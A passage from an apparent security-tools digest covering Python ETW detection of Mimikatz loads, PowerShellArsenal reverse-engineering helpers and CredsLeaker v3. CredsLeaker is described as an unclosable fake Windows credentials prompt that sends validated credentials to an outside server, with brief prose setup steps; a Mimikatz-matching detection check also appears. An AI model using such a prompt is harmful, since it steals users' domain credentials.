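    for e in image_loads(events):
        out[e["ProcessID"]].append(e["XmlEventData"].get("FileName", "").lower())
    return dict(out)


def find_suspicious_loads(events: List[dict], needles=("mimikatz",)) -> List[dict]:
    """The page's use case: spot Mimikatz by what gets mapped into a process.
    Matching on the image name alone is a weak signal (a rename defeats it);
    it is the pivot point for looking at the PID's other loads and timing."""
    hits = []
    for e in image_loads(events):
        name = e["XmlEventData"].get("FileName", "").lower()
        if any(n in name for n in needles):
            hits.append({
                "ProcessID": e["ProcessID"],
                "ProcessName": e["ProcessName"],
                "TimeStamp": e["TimeStamp"],
                "FileName": e["XmlEventData"]["FileName"],
            })
    return hits


if __name__ == "__main__":
    evs = load_events(SAMPLE_LOG)
    for hit in find_suspicious_loads(evs):
        print(hit)
```

Because the kernel provider reports device paths, a filter written against C:\Users\... will silently match nothing; match on the tail of the path or resolve the volume first.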

Link: http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html

CredsLeaker v3 – Tool to Display A Powershell Credentials Box

This script used to display a PowerShell credentials box asking the user for credentials. However, that was highly noticeable. Now it utilizes the Windows Security popup instead.
As before, the box cannot be closed (only by killing the process) and keeps checking the entered credentials against the DC. Once validated, it closes and leaks them to a web server outside. Each validation attempt is a real authentication against the DC, so the failed attempts of a user who mistypes are visible in the domain's logon auditing.

How To:
- Start a web server.
- Type your server IP and port in the ps1 script.
- Execute the batch file.

Legal
This software is provided for educational use only (also with red teamers in mind). Don't use CredsLeaker without mutual consent. If you engage in any illegal activity the author does not take any responsibility for it. By using this software you agree with these terms.

Download CredsLeaker

Link: http://feedproxy.google.com/~r/PentestTools/~3/9y08bFtnHNg/credsleaker-v3-tool-to-display.html

PowerShellArsenal – A PowerShell Module Dedicated To Reverse Engineering

PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code, perform .NET malware analysis, analyze/scrape memory, parse file formats and memory structures, obtain internal system information, etc. PowerShellArsenal is comprised of the following tools:

Disassembly – disassemble native and managed code.
- Get-CSDisassembly: Disassembles a byte array using the Capstone Engine disassembly framework.
- Get-ILDisassembly: Disassembles a raw MSIL byte array passed in from a MethodInfo object in a manner similar to that of Ildasm.

MalwareAnalysis – useful tools when performing malware analysis.
- New-FunctionDelegate: Provides an executable wrapper for an X86 or X86_64 function.
- Invoke-LoadLibrary: Loads a DLL into the current PowerShell process.
- New-DllExportFunction: Creates an executable wrapper delegate around an unmanaged, exported function.
- Get-HostsFile: Parses a HOSTS file.
- New-HostsFileEntry: Replaces or appends an entry to a HOSTS file.
- Remove-HostsFileEntry: Removes an entry or series of entries from a HOSTS file.
- Get-AssemblyStrings: Outputs all strings from a .NET executable.
- Get-AssemblyResources: Extracts managed resources from a .NET assembly.
- Remove-AssemblySuppressIldasmAttribute: Strips a SuppressIldasmAttribute attribute from a .NET assembly.
- Get-AssemblyImplementedMethods: Returns all methods in an assembly that are implemented in MSIL.

MemoryTools – inspect and analyze process memory.
- Get-ProcessStrings: Outputs all printable strings from the user-mode memory of a process.
- Get-VirtualMemoryInfo: A wrapper for kernel32!VirtualQueryEx.
- Get-ProcessMemoryInfo: Retrieves virtual memory information for every unique set of pages in user memory. This function is similar to the !vadump WinDbg command.
- Get-StructFromMemory: Marshals data from an unmanaged block of memory in an arbitrary process to a newly allocated managed object of the specified type.

Parsers – parse file formats and in-memory structures.
- Get-PE: An on-disk and in-memory PE parser and process dumper.
- Find-ProcessPEs: Finds portable executables in memory regardless of whether or not they were loaded in a legitimate fashion.
- Get-LibSymbols: Displays symbolic information from Windows LIB files.
- Get-ObjDump: Displays information about Windows object (OBJ) files.

WindowsInternals – obtain and analyze low-level Windows OS information.
- Get-NtSystemInformation: Calls and parses the output of the ntdll!NtQuerySystemInformation function. It can be used to query internal OS information that is typically not made visible to a user.
- Get-PEB: Returns the process environment block (PEB) of a process.
- Register-ProcessModuleTrace: Starts a trace of loaded process modules.
- Get-ProcessModuleTrace: Displays the process modules that have been loaded since the call to Register-ProcessModuleTrace.
- Unregister-ProcessModuleTrace: Stops the running process module trace.
- Get-SystemInfo: A wrapper for kernel32!GetSystemInfo.

Misc – miscellaneous helper functions.
- Get-Member: A proxy function used to extend the built-in Get-Member cmdlet. It adds the '-Private' parameter, allowing you to display non-public .NET members.
- Get-Strings: Dumps strings from files in both Unicode and ASCII. This cmdlet replicates the functionality of strings.exe from Sysinternals.
- ConvertTo-String: Converts the bytes of a file to a string that has a 1-to-1 mapping back to the file's original bytes. ConvertTo-String is useful for performing binary regular expressions.
- Get-Entropy: Calculates the entropy of a file or byte array.

Lib – libraries required by some of the RE functions.
- Capstone: The Capstone disassembly engine C# binding.
- De4dot: A powerful .NET deobfuscation and .NET PE parsing library.
- PSReflect: A module used to easily define in-memory enums, structs, and Win32 functions.
- Formatters: ps1xml files used to format the output of various PowerShellArsenal functions.

License
The PowerShellArsenal module and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.

Usage
Refer to the comment-based help in each individual script for detailed usage information.

To install this module, drop the entire PowerShellArsenal folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"

To use the module, type: Import-Module PowerShellArsenal
To see the commands imported, type: Get-Command -Module PowerShellArsenal

If you're running PowerShell v3 and you want to remove the annoying "Do you really want to run scripts downloaded from the Internet" warning, once you've placed PowerShellArsenal into your module path, run the following one-liner:
$Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerShellArsenal) ) {Get-ChildItem $_ -Recurse | Unblock-File} }
Unblock-File removes the Zone.Identifier stream that marks the files as downloaded, so only do this for code you have reviewed.

For help on each individual command, Get-Help is your friend.

Note: the tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.

Script Style Guide
For all contributors and future contributors to PowerShellArsenal, I ask that you follow this style guide when writing your scripts/modules.
- Avoid Write-Host at all costs. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. Output custom objects instead. For more information on creating custom objects, read these articles: http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspx and http://technet.microsoft.com/en-us/library/ff730946.aspx
- If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'.
- Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license).
- Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis.
- I prefer that variable names be capitalized and be as descriptive as possible.
- Provide logical spacing in between your code. Indent your code to make it more readable.
- If you find yourself repeating code, write a function.
- Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error.
- If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Use the PSReflect module if possible.
- Do not use hardcoded paths. A script should be usable right out of the box. No one should have to modify the code unless they want to.
- PowerShell v2 compatibility is highly desired.
- Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following: [Parameter(Position = 0, Mandatory = $True)]
- Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias.
- Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break.
- Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader.
- Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement.
- Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters.
- Explicitly state all required and optional dependencies in the comment-based help for your function. All library dependencies should reside in the 'Lib' folder.
- If a script creates complex custom objects, include a ps1xml file that will properly format the object's output. ps1xml files are stored in Lib\Formatters.

Download PowerShellArsenal
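Get-Strings and Get-Entropy, the two Misc helpers described above, reimplemented in Python as an added example for this digest (not the module's code): Shannon entropy over a whole buffer and per fixed-size window, and ASCII/UTF-16LE string extraction in the manner of strings.exe, run on a constructed byte sample. The window size and minimum string length are this example's defaults.

```python
import math
import re
from collections import Counter
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (constant) to 8.0 (uniform).  Packed or
    encrypted payloads sit near the top; plain code and text sit well below."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_windows(data: bytes, size: int = 256) -> List[Tuple[int, float]]:
    """Entropy per window, to locate a high-entropy region inside a file
    instead of averaging it away over the whole thing."""
    return [(off, shannon_entropy(data[off:off + size])) for off in range(0, len(data), size)]


def extract_strings(data: bytes, min_len: int = 4) -> List[Tuple[int, str, str]]:
    """(offset, encoding, text) for printable ASCII and UTF-16LE runs, merged
    in file order, like Sysinternals strings.exe with both encodings enabled."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16-le")) for m in utf16_re.finditer(data)]
    return sorted(found)


# Constructed sample: a PE-ish prefix, one ASCII string, one UTF-16LE string,
# then a 256-byte permutation standing in for an encrypted blob (37 is coprime
# to 256, so every byte value appears exactly once and no 4-byte run stays
# inside the printable range).
BLOB = bytes((i * 37) % 256 for i in range(256))
SAMPLE = (
    b"\x00\x01MZ\x90\x00"
    + b"This program cannot"
    + b"\x00\x00"
    + "kernel32.dll".encode("utf-16-le")
    + b"\x00\xff"
    + BLOB
)


if __name__ == "__main__":
    print("entropy of sample:", round(shannon_entropy(SAMPLE), 3))
    for offset, encoding, text in extract_strings(SAMPLE):
        print(offset, encoding, text)
    for offset, h in entropy_windows(bytes(256) + BLOB):
        print("window", offset, round(h, 3))
```

The double NUL before the UTF-16LE string matters: with a single NUL the trailing "t" of the ASCII string forms a valid UTF-16LE character and the extractor reports "tkernel32.dll", the same artifact strings.exe produces on real binaries.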

Link: http://www.kitploit.com/2019/04/powershellarsenal-powershell-module.html